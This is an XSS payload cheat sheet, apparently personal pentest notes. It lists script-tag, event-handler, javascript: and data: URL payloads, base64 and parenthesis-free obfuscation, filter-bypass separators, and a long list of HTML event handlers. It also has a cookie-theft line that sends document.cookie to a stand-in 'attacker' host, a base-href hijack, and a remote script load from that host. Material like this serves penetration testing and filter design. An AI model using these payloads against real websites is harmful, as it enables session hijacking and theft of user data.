- script tags
- attributes with event handler value (onload, onerror, ...)
- 2.1. some here
- 2.2. to discover others: search for events accepted by the app (use this list) and try to evolve to an xss
- 2.3.
alert(1) == location=window.atob`amF2YXNjcmlwdDphbGVydCgxKQoK`
- attributes with URL value
- 3.1. embed/src, iframe/src, object/data, a/href, button/formaction, form/action more in https://www.w3.org/TR/2017/REC-html52-20171214/fullindex.html#attributes-table
- 3.2.
javascript:alert(1) =~ data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
- some characters to separate attributes are: %09 %0a %0c %0d %20 %2f
- use a separator character
<imgonerror='alert(1)'src
<iframe/src=javascript:alert(1)
- html encode inside attribute values
- eval
- base64
- use grave accent (remove parentheses)
<img/src/
<img onerror=alert(cookie) src
<img onerror=eval.call`${`alert\x281\u0029`}` src>
<svg onload=location=window.atob`amF2YXNjcmlwdDphbGVydCgxMTEp`>
<svg/'https://attacker/1.js'>
<xss style="opacity:0;position:fixed;font-size:999px;top:0;left:0;" onpointerover="alert(1)">test</xss>
<embed src=javascript:location=window.atob`amF2YXNjcmlwdDphbGVydCgxMTEp`>
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
<script>location=window.atob`amF2YXNjcmlwdDphbGVydCgxMTEp`</script>
<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
<script>eval.call`${'alert\x28document.cookie\x29'}`</script>
<script>x=new DOMMatrix;matrix=alert;x.a=1;location='javascript'+':'+x</script>
- put < > " with a separator character inside the tag
<svg </onload=alert(1)"
<!-- onerror --> <img onerror=alert(1) src
<!-- onfocus --> <input/autofocus/ class="pl-kos">>
<!-- onload --> <svg onload=alert(1)>
<!-- onloadstart --> <audio/src/ class="pl-kos">>
<!-- onmouseover --> <newtag style=font-size:900px onmouseover=alert(1)>explosion
<!-- onpointerover --> <xsstag style=font-size:900px onpointerover=alert(1)>explosion
-
reflected to dom-based
eval(location.hash.slice(1))
-
steal cookie
<img src 'http://attacker/'+cookie>
-
change page relative links
<base href="http://attacker/">
-
bypass filter js keywords, change to
[]()!+
: http://www.jsfuck.com/
- https://html.spec.whatwg.org/multipage/indices.html
- https://html.spec.whatwg.org/multipage/webappapis.html#event-handlers-on-elements,-document-objects,-and-window-objects
- https://www.w3.org/TR/2017/REC-html52-20171214/fullindex.html#attributes-table
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
- WAHH, Chapter 12.
- https://github.com/s0md3v/AwesomeXSS
- https://rootsector.blogspot.com/2018/05/cross-site-scripting-xss.html
- https://portswigger.net/research/javascript-without-parentheses-using-dommatrix
- https://html5sec.org/
- https://labs.f-secure.com/blog/getting-real-with-xss/
onactivate
onafterprint
onafterscriptexecute
onanimationcancel
onanimationend
onanimationiteration
onanimationstart
onauxclick
onbeforeactivate
onbeforecopy
onbeforecut
onbeforedeactivate
onbeforepaste
onbeforeprint
onbeforescriptexecute
onbeforeunload
onbegin
onblur
onbounce
oncanplay
oncanplaythrough
onchange
onclick
onclose
oncontextmenu
oncopy
oncut
ondblclick
ondeactivate
ondrag
ondragend
ondragenter
ondragleave
ondragover
ondragstart
ondrop
onend
onended
onerror
onfinish
onfocus
onfocusin
onfocusout
onfullscreenchange
onhashchange
oninput
oninvalid
onkeydown
onkeypress
onkeyup
onload
onloadeddata
onloadedmetadata
onloadend
onloadstart
onmessage
onmousedown
onmouseenter
onmouseleave
onmousemove
onmouseout
onmouseover
onmouseup
onmozfullscreenchange
onpageshow
onpaste
onpause
onplay
onplaying
onpointerdown
onpointerenter
onpointerleave
onpointermove
onpointerout
onpointerover
onpointerrawupdate
onpointerup
onpopstate
onreadystatechange
onrepeat
onreset
onresize
onscroll
onsearch
onseeked
onseeking
onselect
onstart
onsubmit
ontimeupdate
ontoggle
ontouchend
ontouchmove
ontouchstart
ontransitioncancel
ontransitionend
ontransitionrun
onunhandledrejection
onunload
onvolumechange
onwaiting
onwebkitanimationend
onwebkitanimationstart
onwebkittransitionend
onwheel